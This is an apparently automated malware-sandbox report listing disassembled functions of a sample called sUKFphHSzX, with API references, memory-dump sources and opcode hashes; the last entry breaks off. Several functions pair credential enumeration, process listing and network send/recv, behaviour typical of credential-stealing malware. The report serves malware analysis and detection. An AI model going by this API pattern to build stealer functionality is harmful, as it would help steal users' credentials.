API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: a1120071c97c5400eff034d7ddedeb535612727ebb8c8d6e858a39edc6b6f438
Instruction ID: 140fa1626d8bfe70f42124b840160c73892926329ba236c407466f2f0308cd72
Opcode Fuzzy Hash: a1120071c97c5400eff034d7ddedeb535612727ebb8c8d6e858a39edc6b6f438
Instruction Fuzzy Hash: 4151EA62381B4485EE149F17A58839DA351A784BE4F588B61FE6E8B7D7DA78C4C18B00

Function 00007FF6CFA32960 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA32ADC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA32AE2

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
Instruction ID: ac8659366f489382e2bd3c2a0ad10e33b302406f5961b078c09d04b6600b846d
Opcode Fuzzy Hash: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
Instruction Fuzzy Hash: B941D462B19B46C6EE209F96A5043B9E391BB04FD5F584631EEAD8B7C9DE3CD0458310

Function 0000020933558E10 Relevance: 3.1, APIs: 2, Instructions: 87COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32 ref: 0000020933558E69
CoTaskMemFree.OLE32 ref: 0000020933558F2A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: FolderFreeKnownPathTask
String ID:
API String ID: 969438705-0
Opcode ID: 0154addabdfa36918c9010fa8c7802ed5301acea15d1155969cdae83996b9e7f
Instruction ID: 0dca4b022672464c4ed85002b1274be6c0b7ca30356cf7331e8dab985a92990d
Opcode Fuzzy Hash: 0154addabdfa36918c9010fa8c7802ed5301acea15d1155969cdae83996b9e7f
Instruction Fuzzy Hash: FE31A372A54B8481E620CF29E48435AB761F7D97E4F109315FAAE43A96DB7CD1C18F40

Function 000002093356E614 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093356E63B

Part of subcall function 000002093356E5D0: _invalid_parameter_noinfo.LIBCMT ref: 000002093356E5E7

_invalid_parameter_noinfo.LIBCMT ref: 000002093356E6EF

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
Instruction ID: 432f9593accf2a418052e63a8f798d914f516def88cbbb582180079e20a644fd
Opcode Fuzzy Hash: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
Instruction Fuzzy Hash: 3831DF326D6B4481EA54DB54E9DA3A92360E7D4B84F94E6A1F64F473E3EE38C180CB00

Function 0000020933557390 Relevance: 3.1, APIs: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00000209335573E1
RegCloseKey.ADVAPI32 ref: 00000209335573F3

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: f079ec761da95b766b8b6afbeec7fda29d97571b2deafd3f5d4343d11bd09f0c
Instruction ID: c1b683b93016f35aef6b2e9777ab38b913790684dd181b8d2a99842374e94003
Opcode Fuzzy Hash: f079ec761da95b766b8b6afbeec7fda29d97571b2deafd3f5d4343d11bd09f0c
Instruction Fuzzy Hash: ED21B621755B4485FE509B21F48536AB760EBD5BD4F549151FE8F43B9BDE28C4C1CB00

Function 000002093355664C Relevance: 3.1, APIs: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000002093351C8C0: CreateToolhelp32Snapshot.KERNEL32 ref: 000002093351C90A
Part of subcall function 000002093351C8C0: Process32FirstW.KERNEL32 ref: 000002093351C94C

Part of subcall function 000002093351ACC0: CredEnumerateA.ADVAPI32 ref: 000002093351AD22

Part of subcall function 000002093355E9F0: recv.WS2_32 ref: 000002093355EBCC

ReleaseMutex.KERNEL32 ref: 00000209335566BB
CloseHandle.KERNEL32 ref: 00000209335566C4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
String ID:
API String ID: 420082584-0
Opcode ID: 9203085a7878e38a17fb01eed7973885c1ae290ee803226217edc0b1b83e6934
Instruction ID: 38e00599b57a6d64e2f0a5f967f73cc1bfd5342a3b5edd23cd11f19d4ed582e2
Opcode Fuzzy Hash: 9203085a7878e38a17fb01eed7973885c1ae290ee803226217edc0b1b83e6934
Instruction Fuzzy Hash: EB218E11AD67C041FE61B7B8A0DF3AD6290ABC5791F54EAC0F99F01AD7DE2890C48E21

Function 000002093355667D Relevance: 3.0, APIs: 2, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000002093355E9F0: recv.WS2_32 ref: 000002093355EBCC

ReleaseMutex.KERNEL32 ref: 00000209335566BB
CloseHandle.KERNEL32 ref: 00000209335566C4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexReleaserecv
String ID:
API String ID: 2659716615-0
Opcode ID: e4dcb88e9ab488ff8cfe7a9f52c1e9e826153abf652470df38d82227f385c117
Instruction ID: c09b778df33eb6fc0874c7af317dab5bd04c3be28b42f15da4b8adfd70a3645f
Opcode Fuzzy Hash: e4dcb88e9ab488ff8cfe7a9f52c1e9e826153abf652470df38d82227f385c117
Instruction Fuzzy Hash: 1111CE21AD27C041FE607B38A0DE3AD6290ABC5791F44EA81FA9F01AD7DE28D0C48E10

Function 000002093357DB60 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 000002093357DBAC
GetLastError.KERNEL32 ref: 000002093357DBB6

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
Instruction ID: b3a012e35f6693c947552b4571dc83d8f1ef2f2d69c337d3d7801bc06dadce72
Opcode Fuzzy Hash: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
Instruction Fuzzy Hash: B0119162314B8081DA108B29E48C259A7A1F785BF4F548751FE7E4B7DBCE78C0908B40

Function 00007FF6CFA5CE54 Relevance: 3.0, APIs: 2, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA5CE84

Part of subcall function 00007FF6CFA5DAE0: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CFA5DAE9

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CFA5CE8A

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
Instruction ID: b061ff8f8dc51fb5bd7aae4775d0fa166b919b89dc162a1883b0670be065ee92
Opcode Fuzzy Hash: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
Instruction Fuzzy Hash: 95E08C40E1DA1BE6F9282DF11412179E3400F49BB2E282731DEFECB2C7AD0CB0958130

Function 000002093358CB98 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093358CBC8

Part of subcall function 000002093358DBEC: std::bad_alloc::bad_alloc.LIBCMT ref: 000002093358DBF5

Concurrency::cancel_current_task.LIBCPMT ref: 000002093358CBCE

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
Instruction ID: a4062868c03921981b645c8118e0859317b059215fe68bade5c63aac8ce029aa
Opcode Fuzzy Hash: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
Instruction Fuzzy Hash: B8E0E2217D2B0951F92837BA18CE3A540C04BD9372E989BA279BF0D3C3A914CCD58E50

Function 00007FF6CFA50554 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,00000000,00007FF6CFA50C21,?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000), ref: 00007FF6CFA5056A
GetLastError.KERNEL32(?,?,00000000,00007FF6CFA50C21,?,?,00001219A6C7858C,00007FF6CFA5066D,?,?,?,?,00007FF6CFA5C66A,?,?,00000000), ref: 00007FF6CFA50574

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
Instruction ID: 49eeef53ec164231b3638e8f97d4a7dd9288c665e8504f2a561119c46e059b0c
Opcode Fuzzy Hash: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
Instruction Fuzzy Hash: A9E0BF51F09A03C2FB185FF2585557563695F98742F14C934DD8EC7291DE3C64858620

Function 000002093357B550 Relevance: 2.5, APIs: 2, Instructions: 18memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000002093357B566
GetLastError.KERNEL32 ref: 000002093357B570

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
Instruction ID: 35f82cc7984c6c6569c355b1811b82259053f28c56f34adaca077f736fe139a3
Opcode Fuzzy Hash: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
Instruction Fuzzy Hash: 61E01790F9178592FF1867F298DE36912956BD8781F04C5A0BA1F96293EE3888C54A50

Function 000002093356D450 Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093356D6A0

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: f7a667012a197972edc85fce7eb5ed9ef64fb820ea145e4ac26cd35cc7fb6d16
Instruction ID: 11c2673e33dd1cff8c5c32b71e7266f710d964c45a9b7d16800eb619cab74239
Opcode Fuzzy Hash: f7a667012a197972edc85fce7eb5ed9ef64fb820ea145e4ac26cd35cc7fb6d16
Instruction Fuzzy Hash: 4E61AD32340B8085EA249B16D19832C23E1A394FD8F54EA51EE1F6B7D7DB39C8C5CB40

Function 000002093350E150 Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

APIs

__std_fs_directory_iterator_open.LIBCPMT ref: 000002093350E283

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_fs_directory_iterator_open
String ID:
API String ID: 4007087469-0
Opcode ID: 40c0a9036cf93464b18acd0ea1d451f6a84d28def566f6255d687b160919cdb8
Instruction ID: 5ac4470173ee27896ece9285667aef0aaa64f79e45ba646aec738b8189d145d9
Opcode Fuzzy Hash: 40c0a9036cf93464b18acd0ea1d451f6a84d28def566f6255d687b160919cdb8
Instruction Fuzzy Hash: A861F262BC0B40A5FB10DB79D4D93AC23A1E7C6798F509651FE1E576E7EA35C8C18B00

Function 000002093352A050 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093352A1F8

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ed1dd30d252098bb1b0af6a310428b7624b935653fcb3c195ac7384d3a183f9c
Instruction ID: 0588bfa9d68f4c23eb70142242defabe2033a3d479fbb01a85c6205ce1f29941
Opcode Fuzzy Hash: ed1dd30d252098bb1b0af6a310428b7624b935653fcb3c195ac7384d3a183f9c
Instruction Fuzzy Hash: 8441BE62341B8481EE14DB56E49826A66A1B388BF4F508725FF7E8BBC7DF38C4D18700

Function 0000020933525B00 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000020933525C95

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 959a00c4b16b265a8a566181e24d5a9231dc7a7f91328b3b72903ca79dbd13dd
Instruction ID: cc8a241880db67d82ecc4d182edb58fe7d36ef201dd5cd496953c2c04699e078
Opcode Fuzzy Hash: 959a00c4b16b265a8a566181e24d5a9231dc7a7f91328b3b72903ca79dbd13dd
Instruction Fuzzy Hash: E741BF72344B8485EE109F16A48839DA361B789BD4F548A61FEAF4B787EE39C4858B04

Function 000002093354B010 Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093354B1B7

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 2437e07e6010e6be8596aa970daa91c7d1c841486e60ff4151f2909304368a25
Instruction ID: bada6d1d50fe8b351bca02bb3f6331f204d8fe3a83244d6ba19f155cdb4853a4
Opcode Fuzzy Hash: 2437e07e6010e6be8596aa970daa91c7d1c841486e60ff4151f2909304368a25
Instruction Fuzzy Hash: 2541A476258B8481DA18CB55E59836EB3A1F789BD4F50C655ABEE07B97DF38C081CB00

Function 0000020933525CB0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000020933525E2C

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: c3015d5ab4373220afbb853b99ae6540ac39733ad11e9e62ffe6e39e66509395
Instruction ID: bce1e71a1978963cba6d79890bddb4c96f70ec44c6a9808baf9c25021edbf70b
Opcode Fuzzy Hash: c3015d5ab4373220afbb853b99ae6540ac39733ad11e9e62ffe6e39e66509395
Instruction Fuzzy Hash: 7541B272341B8495EE10DF16A98C39DA351A784BD8F548A61EF6E8F7D7DA38C1818B04

Function 00000209335215C0 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000020933521711

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 9ff769239085dfe789d1c0cfd6ab4ed190a35192943c769ad5e49886ef3748da
Instruction ID: 5368ee3262c837cc8a0cf79a68dd5559401fe91b645d7926a57698fa86e23ecd
Opcode Fuzzy Hash: 9ff769239085dfe789d1c0cfd6ab4ed190a35192943c769ad5e49886ef3748da
Instruction Fuzzy Hash: 8A313922381B4444FE159B56D5C836E12819785FE9F588261EE2F8BBC7EE34D5C1CB40

Function 000002093357BA50 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093357BA78

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 62a68b64f697a3323ce5c67975f603dd912b7630c4b3619a8df593f8b8e10b11
Instruction ID: aaf308d6e7f993da71fe1b3c4f870a785fa65e247477e1c0eb83a74e689cd4b4
Opcode Fuzzy Hash: 62a68b64f697a3323ce5c67975f603dd912b7630c4b3619a8df593f8b8e10b11
Instruction Fuzzy Hash: 2E41027269430487EA349B19E9D836D77A0E7D6B84F148241FB9F836E7CB28D482CF50

Function 0000020933525990 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0000020933525AEB

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: bf4e17abb93627f1325a26499b2a2a83d85497db00828f912845ee1b23ada7ca
Instruction ID: 4b9b3056592cafa80de7daee1d6a0449fbabb3f0b00a64cc36e2236f2c0f179b
Opcode Fuzzy Hash: bf4e17abb93627f1325a26499b2a2a83d85497db00828f912845ee1b23ada7ca
Instruction Fuzzy Hash: 1F31127238578085EE109F16A5C939DA392A384BD5F588A61FE6E8BBC7DB78C0C1C700

Function 0000020933560250 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32 ref: 00000209335602E0

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 30086006468ef0159e1a8da4b572090d137de622bf7d6fb17ffa2a39af53fcaf
Instruction ID: 7471c2bdd1e72e04358c9922e549e0d51a92849bed2fe814e81da0c0f4b41abb
Opcode Fuzzy Hash: 30086006468ef0159e1a8da4b572090d137de622bf7d6fb17ffa2a39af53fcaf
Instruction Fuzzy Hash: DB518F33A54B8086E710CF68E48439D77B4F7C9788F509252EB8D57A9ADF78D584CB40

Function 000002093351FE50 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 000002093351FF58

Part of subcall function 000002093350B7B0: __std_exception_copy.LIBVCRUNTIME ref: 000002093350B7F8

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task__std_exception_copy
String ID:
API String ID: 317858897-0
Opcode ID: 865d4f7b0b2f7137917db30c6eb8c5f1a771ab0d233d53981c9594fadb476a58
Instruction ID: 65292c86c05f6c0a67c2d8ed1a5a99cfee5d6906535146f3699b105f7a242ba9
Opcode Fuzzy Hash: 865d4f7b0b2f7137917db30c6eb8c5f1a771ab0d233d53981c9594fadb476a58
Instruction Fuzzy Hash: 2621D762B41B4041EE59EB15A1C43AD6290A784BA4F24C761EA7E87BD3EB79C4D28740

Function 000002093357D4D0 Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093357D556

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
Instruction ID: 4a374086fe3c5590ee71e70b7ddd95b04c5670a2a2a298bb2c9c037a7d2eb47b
Opcode Fuzzy Hash: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
Instruction Fuzzy Hash: DD31C2B265471086FB11AF69D8C939C26A0A7C4BE9F418285FA6F0B3D3DB78C4C18F11

Function 000002093359E208 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093359E22B

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
Instruction ID: 4481d24ae68ed2a912af9e5ed5a6cb21b1a219cbb945a1aead551ceaff2be7cf
Opcode Fuzzy Hash: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
Instruction Fuzzy Hash: 1321A432284B4087EB618F18D48476976A2F7C4B94F148364F75E8B6EBDB38C8808F00

Function 000002093359C510 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002093359C46D

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
Instruction ID: be886be46c8101c707c4edd05c6ed8ade8fd4be19cc2e26b6ec181ddde93af68
Opcode Fuzzy Hash: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
Instruction Fuzzy Hash: AD117F22759740C1EA609F51D4883BDA2A1F7C6B81F48D591FA8F4BA97CB7DC4C18F50

Function 000002093355ADC0 Relevance: 1.5, APIs: 1, Instructions: 38networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 000002093355AE08

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
Instruction ID: 0c128f92db870fe3d04022b301f058dfed71743eba6ae50b57f5331e4e500de7
Opcode Fuzzy Hash: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
Instruction Fuzzy Hash: 4101D621B14B8481EB508F1AF985219B3A0F7C8FD4F489171EF5E43F4EDB28C8918B40

Function 00000209335158F3 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNEL32 ref: 0000020933515936

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
Instruction ID: 06b92261311890c6cd8ace901f2c8613468dd2b4add02a9203edc8f49677bd03
